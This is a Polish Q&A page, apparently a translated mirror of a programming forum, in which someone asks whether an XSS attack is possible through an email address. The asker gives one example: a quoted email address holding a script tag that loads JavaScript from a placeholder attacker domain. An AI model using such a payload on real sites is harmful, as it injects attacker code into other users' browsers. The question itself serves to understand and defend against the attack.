Czy ataki XSS są możliwe za pośrednictwem adresów e-mail?

Question

Jul 05, 2013, 05:53 AM

Czy ataki XSS są możliwe za pośrednictwem adresów e-mail?

Zastanawiam się, czy adres e-mail może być użyty do ataków XSS.

Załóżmy, że istnieje strona internetowa, na której można zarejestrować się i podać swój adres e-mail. Jeśli ktoś chce zaatakować daną witrynę, może utworzyć adres e-mail, taki jak ten:

"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com

a następnie użyj tego adresu e-mail, aby zaatakować witrynę.

Czy cytat lub tag skryptu jest dozwolony w adresie e-mail?

questionAnswers(1)

Popularne pytania

0 odpowiedzi

Haml :: SyntaxError - Niedozwolone zagnieżdżanie: treść nie może być podana w tej samej linii co% a i zagnieżdżona w nim

0 odpowiedzi

Znajdź ilość wody w i-tym kubku w strukturze piramidy?

0 odpowiedzi

Różnica między typedef a C ++ 11 alias typu [duplikat]

0 odpowiedzi

Dlaczego Sytem.totalMemory stale rośnie?

0 odpowiedzi

Jak uzyskać katalog podczas uruchamiania testu jednostkowego

Jesteś bardzo aktywny! To świetnie!

Czy ataki XSS są możliwe za pośrednictwem adresów e-mail?

questionAnswers(1)

yourAnswerToTheQuestion

Popularne pytania